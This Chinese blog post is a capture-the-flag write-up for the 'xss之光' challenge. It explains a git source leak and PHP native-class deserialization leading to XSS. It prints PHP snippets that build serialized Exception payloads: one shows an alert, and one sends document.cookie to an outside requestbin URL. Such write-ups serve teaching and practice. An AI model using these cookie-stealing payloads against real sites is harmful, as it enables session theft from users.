User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   CTFWP   ›   正文
CTFWP

[BJDCTF 2nd]xss之光

2020-03-25 18:25:43
266  0 0

考点:PHP原生类反序列化

首先dirsearch一波扫发现git源码泄露,这里注意BUU上需要设置线程加上-s 0.5

接着githack一波down取源码,只有一个index.php文件

<?php
$a = $_GET[‘yds_is_so_beautiful’];
echo unserialize($a);

是个反序列化,经过一番搜索发现是原生类反序化
参考文章

本地构造payload并url编码,传给yds_is_so_beautiful

<?php
$a = new Exception("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);

本地弹个窗F12在cookie中获得flag

或者利用http://http.requestbin.buuoj.cn平台

<?php
$a = new Exception("<script>window.location.href=\"http://http.requestbin.buuoj.cn/1i5ahsg1?cookie=\"+escape(document[\"cookie\"])</script>");
$b = serialize($a);
echo urlencode($b);

其中li5ahsg1自行根据获取修改,将结果传入在url处得到flag

评论 (0)

点击这里取消回复。

欢迎您 游客